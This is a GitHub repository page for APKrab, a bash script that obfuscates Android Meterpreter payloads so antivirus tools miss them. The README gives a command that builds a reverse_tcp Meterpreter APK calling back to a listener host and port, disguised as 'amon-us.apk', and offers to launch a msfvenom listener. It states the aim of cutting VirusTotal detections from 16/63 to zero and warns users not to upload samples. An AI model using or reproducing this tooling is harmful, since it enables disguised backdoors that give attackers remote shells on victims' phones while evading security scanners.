Skip to content
/ APKrab Public

Dummy bash script to obfuscate android meterpreter by mixing names and permissions in AndroidManifest.xml

License

Notifications You must be signed in to change notification settings

c04tl/APKrab

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Inspired by

This script is inspired by jbreed's apkwash (Thanks a lot!)

Dependencies

To use APKrab you first need to install apktool and default-jdk

APKrab

APKrab is a dummy bash script to obfuscate android meterpreter by mixing names and permissions in AndroidManifest.xml and other files and directories Preview

Usage

First we must give execution permissions with chmod +x APKrab.sh Then we can do for example: ./APKrab.sh -p android/meterpreter/reverse_tcp -H 10.0.0.16 -P 7777 -o amon-us.apk

APKrab also has default options we can use them with: ./APKrab.sh -g Preview

At the end APKrab will ask to generate a msfvemon listener if so then it will ask to launch it Preview

virustotal results (DONT UPLOAD YOUR SAMPLES TO VIRUSTOTAL)

In this example we hit 16/63 in virustotal so hope with the time and your modifications we can hit 0 flagged Preview

About

Dummy bash script to obfuscate android meterpreter by mixing names and permissions in AndroidManifest.xml

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages